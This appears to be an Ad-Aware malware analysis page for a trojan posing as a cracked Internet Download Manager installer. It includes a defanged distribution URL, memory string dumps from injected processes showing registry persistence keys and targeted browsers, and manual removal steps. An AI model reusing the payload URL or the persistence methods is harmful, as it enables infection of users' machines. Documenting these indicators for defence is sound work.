hXXp://gold.bellverse.bid/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_1796_rwx_10004000_00001000:




callback%d

iexplore.exe_1972:




.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_3348:




.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

setup.exe_772:




.idata
.rdata
P.reloc
P.rsrc
uxtheme.dll
;CRt$
PSAPI.dll
kernel32.dll
1.1.4
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
URLInfoAbout
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
! " # 0 1 2 3!
! !!!"!#!0!1!2!3"
" "!"""#"0"1"2"3#
# #!#"###0#1#2#30
0 0!0"0#000102031
1 1!1"1#101112132
2 2!2"2#202122233
3 3!3"3#30313233
.tu<'tA
ju2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
WinExec
gdi32.dll
GetKeyState
ExitWindowsEx
EnumWindows
winmm.dll
ole32.dll
comctl32.dll
shell32.dll
GetWindowsDirectoryA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteA
cabinet.dll
0(0,00040
7 7$717?7
? ?$?(?,?0?4?
11h1
KWindows
UrlMon
version="1.0.0.0"
name="Microsoft.Windows.SIM"
<requestedExecutionLevel level="requireAdministrator"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
Crackingpatching.com Team
Crackingpatching.com Team






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    setup.exe:772
    open.exe:1968
    RTOBwd4yYx.exe:3396
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\16.tmp (838 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\7.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\4.tmp (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\2.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\launch_reb[1].htm (189 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\vHbOehhRxp (189 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe (4648 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe (6029 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B (32454 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E12.tmp (1568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (7539 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (956 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (14 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now